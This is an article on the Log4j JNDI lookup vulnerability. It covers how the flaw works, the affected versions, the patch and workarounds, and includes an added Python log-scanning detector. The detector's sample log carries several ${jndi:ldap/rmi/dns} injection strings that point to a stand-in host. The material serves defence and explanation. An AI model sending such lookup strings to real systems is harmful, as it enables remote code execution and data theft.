Hackers continue to exploit a critical vulnerability in Log4J

A lot has been said on the web about the vulnerability in Log4J that allows an attacker to trigger arbitrary remote code execution if you are able to send data to an application that uses the log4j library to log the event.

This attack can be carried out without being authenticated, for example through an authentication page that logs authentication failures.

This flaw has set companies specializing in cyber security to work on the matter and has shown that the number of attacks exploiting this vulnerability is growing.

Members of the Apache Software Foundation have developed a patch that fixes the vulnerability, released as version 2.15.0; in addition, possible workarounds to reduce the risk have also been announced.

What is Apache Log4j? How serious is the flaw?

For those who still do not know what the problem is, I can tell you that on December 9 a vulnerability was discovered in the Apache log4j logging library.

This library is widely used in Java/J2EE application development projects and in standard Java/J2EE software solutions.

Log4j includes a lookup mechanism that can be used to make queries with a special syntax inside a format string. For example, it can be used to request various parameters, such as the Java environment version via ${java:version}, and so on.

By specifying the jndi key in the string, the lookup path uses the JNDI API. By default, all requests are made with the prefix java:comp/env/*; however, the authors implemented the option to use a custom prefix by means of a colon in the key.

This is where the vulnerability lies: if jndi:ldap:// is used as the key, the request goes to the specified LDAP server. Other communication protocols such as LDAPS, DNS and RMI can also be used.

Consequently, a remote server controlled by an attacker can return an object to the vulnerable server, which can lead to arbitrary code execution on the system or the leakage of confidential data.

All an attacker has to do is send a specially crafted string through any path that writes that string to the log file, so that the Log4j library processes it.

This can be done with simple HTTP requests, for example those sent through web forms, data fields and so on, or with any other type of interaction that uses server-side logging.

Tenable describes the vulnerability as "the most important and most critical vulnerability of the past decade."

A proof of concept has already been published. This vulnerability is now being actively exploited.

The severity of the vulnerability is the maximum of 10 on the CVSS scale.

Here is the list of affected systems:

  • Apache Log4j versions 2.0 to 2.14.1
  • Apache Log4j 1.x versions (deprecated), under a specific configuration.
  • Products that use a vulnerable version of Apache Log4j: the European national CERT maintains a complete list of products and their vulnerability status.

CERT-FR recommends carrying out a thorough analysis of network logs. The following patterns can be used to detect attempts to exploit this vulnerability when they are used in URLs or in other HTTP headers such as the user agent.
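As an added example (not part of the original post or of any CERT advisory), the following Python script scans web-server access-log lines for the ${jndi:...} lookup form described above, limited to the LDAP, LDAPS, RMI and DNS schemes the text names; the log lines, IP addresses and hostnames are constructed for the example.

```python
import re
from urllib.parse import unquote

# Matches the ${jndi:<scheme>:// lookup form described above. Only the schemes
# named in the text are covered; this is a starting point, not a complete detector.
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns)\s*:", re.IGNORECASE)

# Combined log format: ip - - [ts] "METHOD path HTTP/x" status size "referer" "user-agent"
ACCESS_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Constructed sample log (RFC 5737 test addresses, reserved .example hostname).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Dec/2021:13:05:11 +0000] "GET /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:13:05:14 +0000] "GET /login?user=${jndi:ldap://lookup.example/a} HTTP/1.1" 401 0 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:13:05:20 +0000] "GET /health HTTP/1.1" 200 2 "-" "${JNDI:RMI://lookup.example/b}"
203.0.113.9 - - [10/Dec/2021:13:05:25 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Flookup.example%2Fc%7D HTTP/1.1" 200 9 "-" "curl/7.79"
"""


def find_jndi_lookups(lines):
    """Return one (client_ip, field, scheme) tuple per log field carrying a JNDI lookup.

    The request line, referer and user agent are each inspected, since all three are
    commonly written to server-side logs. Fields are percent-decoded twice before
    matching so that requests the server logged in URL-encoded form are still caught.
    """
    findings = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m:
            continue  # not in combined log format; skip rather than guess
        for field in ("request", "referer", "agent"):
            decoded = unquote(unquote(m.group(field)))
            hit = JNDI_LOOKUP.search(decoded)
            if hit:
                findings.append((m.group("ip"), field, hit.group(1).lower()))
    return findings


if __name__ == "__main__":
    for ip, field, scheme in find_jndi_lookups(SAMPLE_LOG.splitlines()):
        print(f"{ip}: JNDI {scheme} lookup in {field}")
```

Feed real access logs in line by line; a match identifies the client address and the header the lookup string arrived in, which is the starting point for the deeper log review CERT-FR recommends.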

Finally, it is worth mentioning that it is strongly recommended to move to log4j version 2.15.0 as soon as possible.

However, if there are problems migrating to this version, the following solutions can be used temporarily:
For applications using versions 2.7.0 and later of the log4j library, it is possible to protect against any attack by modifying the format of the events to be logged, using the syntax %m{nolookups} for data that will be supplied by the user.

This fix requires modifying the log4j configuration file to produce a new version of the application. Therefore, it requires repeating the technical and functional validation steps before deploying this new version.

For applications using versions 2.10.0 and later of the log4j library, it is also possible to protect against any attack by changing the configuration parameter log4j2.formatMsgNoLo

